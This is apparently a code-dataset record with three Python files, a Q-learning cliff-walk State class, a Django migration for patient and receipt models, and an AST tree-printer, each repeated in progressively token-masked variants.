(reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n <function token>\n <function token>\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<class token>\n<function token>\n<function token>\n<docstring token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
41
52da8608e43b2d8dfe00f0956a1187fcf2e7b1ff
# Generated by Django 2.2.6 on 2020-05-21 09:44 import datetime from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('DHOPD', '0015_auto_20200515_0126'), ] operations = [ migrations.CreateModel( name='Patient_c', fields=[ ('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)), ('patient_fname', models.CharField(max_length=200)), ('patient_mname', models.CharField(max_length=200)), ('patient_lname', models.CharField(max_length=200)), ('patient_title', models.CharField(max_length=20)), ('patient_address', models.CharField(max_length=500)), ('patient_town', models.CharField(max_length=200)), ('patient_phone', models.CharField(max_length=15)), ('patient_services', models.CharField(max_length=500)), ('patient_status', models.CharField(max_length=2)), ('patient_cost', models.CharField(max_length=100)), ('patient_date', models.DateField(default=datetime.date.today)), ('patient_time', models.TimeField(auto_now_add=True)), ('patient_comment', models.CharField(max_length=200)), ], ), migrations.CreateModel( name='Receipt_c', fields=[ ('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)), ('receipt_patient', models.CharField(max_length=200)), ('receipt_cost', models.CharField(max_length=200)), ('receipt_time', models.TimeField(auto_now=True)), ('receipt_status', models.CharField(default='-1', max_length=10)), ], ), ]
[ "# Generated by Django 2.2.6 on 2020-05-21 09:44\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('DHOPD', '0015_auto_20200515_0126'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Patient_c',\n fields=[\n ('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),\n ('patient_fname', models.CharField(max_length=200)),\n ('patient_mname', models.CharField(max_length=200)),\n ('patient_lname', models.CharField(max_length=200)),\n ('patient_title', models.CharField(max_length=20)),\n ('patient_address', models.CharField(max_length=500)),\n ('patient_town', models.CharField(max_length=200)),\n ('patient_phone', models.CharField(max_length=15)),\n ('patient_services', models.CharField(max_length=500)),\n ('patient_status', models.CharField(max_length=2)),\n ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)),\n ('patient_time', models.TimeField(auto_now_add=True)),\n ('patient_comment', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Receipt_c',\n fields=[\n ('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),\n ('receipt_patient', models.CharField(max_length=200)),\n ('receipt_cost', models.CharField(max_length=200)),\n ('receipt_time', models.TimeField(auto_now=True)),\n ('receipt_status', models.CharField(default='-1', max_length=10)),\n ],\n ),\n ]\n", "import datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('DHOPD', '0015_auto_20200515_0126')]\n operations = [migrations.CreateModel(name='Patient_c', fields=[(\n 'patient_id', models.AutoField(max_length=200, primary_key=True,\n serialize=False)), ('patient_fname', models.CharField(max_length=\n 200)), ('patient_mname', models.CharField(max_length=200)), (\n 'patient_lname', models.CharField(max_length=200)), (\n 'patient_title', models.CharField(max_length=20)), (\n 'patient_address', models.CharField(max_length=500)), (\n 'patient_town', models.CharField(max_length=200)), ('patient_phone',\n models.CharField(max_length=15)), ('patient_services', models.\n CharField(max_length=500)), ('patient_status', models.CharField(\n max_length=2)), ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)), (\n 'patient_time', models.TimeField(auto_now_add=True)), (\n 'patient_comment', models.CharField(max_length=200))]), migrations.\n CreateModel(name='Receipt_c', fields=[('receipt_id', models.\n AutoField(max_length=200, primary_key=True, serialize=False)), (\n 'receipt_patient', models.CharField(max_length=200)), (\n 'receipt_cost', models.CharField(max_length=200)), ('receipt_time',\n models.TimeField(auto_now=True)), ('receipt_status', models.\n CharField(default='-1', max_length=10))])]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('DHOPD', '0015_auto_20200515_0126')]\n operations = [migrations.CreateModel(name='Patient_c', fields=[(\n 'patient_id', models.AutoField(max_length=200, primary_key=True,\n serialize=False)), ('patient_fname', models.CharField(max_length=\n 200)), ('patient_mname', models.CharField(max_length=200)), (\n 'patient_lname', models.CharField(max_length=200)), (\n 'patient_title', models.CharField(max_length=20)), (\n 'patient_address', models.CharField(max_length=500)), (\n 'patient_town', models.CharField(max_length=200)), ('patient_phone',\n models.CharField(max_length=15)), ('patient_services', models.\n CharField(max_length=500)), ('patient_status', models.CharField(\n max_length=2)), ('patient_cost', models.CharField(max_length=100)),\n ('patient_date', models.DateField(default=datetime.date.today)), (\n 'patient_time', models.TimeField(auto_now_add=True)), (\n 'patient_comment', models.CharField(max_length=200))]), migrations.\n CreateModel(name='Receipt_c', fields=[('receipt_id', models.\n AutoField(max_length=200, primary_key=True, serialize=False)), (\n 'receipt_patient', models.CharField(max_length=200)), (\n 'receipt_cost', models.CharField(max_length=200)), ('receipt_time',\n models.TimeField(auto_now=True)), ('receipt_status', models.\n CharField(default='-1', max_length=10))])]\n", "<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false
42
1084478226777b9259274e053984ac34d461198d
from .ast import * # noinspection PyPep8Naming def addToClass(cls): def decorator(func): setattr(cls, func.__name__, func) return func return decorator def print_intended(to_print, intend): print(intend * "| " + to_print) # noinspection PyPep8Naming,PyUnresolvedReferences class TreePrinter: # General @addToClass(Node) def printTree(self, indent=0): raise Exception("printTree not defined in class " + self.__class__.__name__) @addToClass(Instruction) def printTree(self, indent=0): print_intended(self.type, indent) @addToClass(Expression) def printTree(self, indent=0): print_intended(self.type, indent) # Instructions @addToClass(Block) def printTree(self, indent=0): print_intended(self.type, indent) if self.instructions is not None: self.instructions.printTree(indent + 1) @addToClass(Assignment) def printTree(self, indent=0): print_intended(self.operator, indent) self.left.printTree(indent + 1) self.right.printTree(indent + 1) @addToClass(For) def printTree(self, indent=0): print_intended(self.type, indent) self.variable.printTree(indent + 1) self.range.printTree(indent + 1) self.instruction.printTree(indent + 1) @addToClass(While) def printTree(self, indent=0): print_intended(self.type, indent) self.condition.printTree(indent + 1) self.instruction.printTree(indent + 1) @addToClass(If) def printTree(self, indent=0): print_intended(self.type, indent) self.condition.printTree(indent + 1) print_intended('then', indent) self.if_block.printTree(indent + 1) if self.else_block is not None: print_intended('else', indent) self.else_block.printTree(indent + 1) @addToClass(Print) def printTree(self, indent=0): print_intended(self.type, indent) self.args.printTree(indent + 1) @addToClass(Return) def printTree(self, indent=0): print_intended(self.type, indent) if self.args is not None: self.args.printTree(indent + 1) @addToClass(ArrayElement) def printTree(self, indent=0): print_intended("get_element", indent) self.array.printTree(indent + 1) self.ids.printTree(indent + 1) # Expressions @addToClass(Value) def printTree(self, indent=0): print_intended(str(self.value), indent) @addToClass(Array) def printTree(self, indent=0): if self.list is not None: print_intended('array', indent) self.list.printTree(indent + 1) else: print_intended('empty_array', indent) @addToClass(BinaryExpression) def printTree(self, indent=0): print_intended(self.operator, indent) self.left.printTree(indent + 1) self.right.printTree(indent + 1) @addToClass(MatrixFunction) def printTree(self, indent=0): print_intended(self.function, indent) self.parameter.printTree(indent + 1) @addToClass(UnaryMinus) def printTree(self, indent=0): print_intended('-', indent) self.value.printTree(indent + 1) @addToClass(Transpose) def printTree(self, indent=0): print_intended(self.type, indent) self.value.printTree(indent + 1) # Other @addToClass(Program) def printTree(self, indent=0): print_intended(self.type, indent) self.instructions_opt.printTree(indent + 1) @addToClass(Identifier) def printTree(self, indent=0): print_intended(self.name, indent) @addToClass(Range) def printTree(self, indent=0): print_intended(self.type, indent) self.start_value.printTree(indent + 1) self.end_value.printTree(indent + 1) @addToClass(List) def printTree(self, indent=0): for element in self.elements: element.printTree(indent)
[ "from .ast import *\n\n\n# noinspection PyPep8Naming\ndef addToClass(cls):\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * \"| \" + to_print)\n\n\n# noinspection PyPep8Naming,PyUnresolvedReferences\nclass TreePrinter:\n\n # General\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception(\"printTree not defined in class \" + self.__class__.__name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n # Instructions\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended(\"get_element\", indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n # Expressions\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n # Other\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "from .ast import *\n\n\ndef addToClass(cls):\n\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * '| ' + to_print)\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n\n\ndef addToClass(cls):\n\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\ndef print_intended(to_print, intend):\n print(intend * '| ' + to_print)\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n\n\ndef addToClass(cls):\n\n def decorator(func):\n setattr(cls, func.__name__, func)\n return func\n return decorator\n\n\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n\n @addToClass(Return)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.args is not None:\n self.args.printTree(indent + 1)\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(MatrixFunction)\n def printTree(self, indent=0):\n print_intended(self.function, indent)\n self.parameter.printTree(indent + 1)\n\n @addToClass(UnaryMinus)\n def printTree(self, indent=0):\n print_intended('-', indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Transpose)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.value.printTree(indent + 1)\n\n @addToClass(Program)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.instructions_opt.printTree(indent + 1)\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n\n @addToClass(Range)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.start_value.printTree(indent + 1)\n self.end_value.printTree(indent + 1)\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n\n @addToClass(Node)\n def printTree(self, indent=0):\n raise Exception('printTree not defined in class ' + self.__class__.\n __name__)\n\n @addToClass(Instruction)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Expression)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n\n @addToClass(Block)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n if self.instructions is not None:\n self.instructions.printTree(indent + 1)\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(While)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n\n @addToClass(If)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.condition.printTree(indent + 1)\n print_intended('then', indent)\n self.if_block.printTree(indent + 1)\n if self.else_block is not None:\n print_intended('else', indent)\n self.else_block.printTree(indent + 1)\n\n @addToClass(Print)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.args.printTree(indent + 1)\n <function token>\n\n @addToClass(ArrayElement)\n def printTree(self, indent=0):\n print_intended('get_element', indent)\n self.array.printTree(indent + 1)\n self.ids.printTree(indent + 1)\n\n @addToClass(Value)\n def printTree(self, indent=0):\n print_intended(str(self.value), indent)\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n 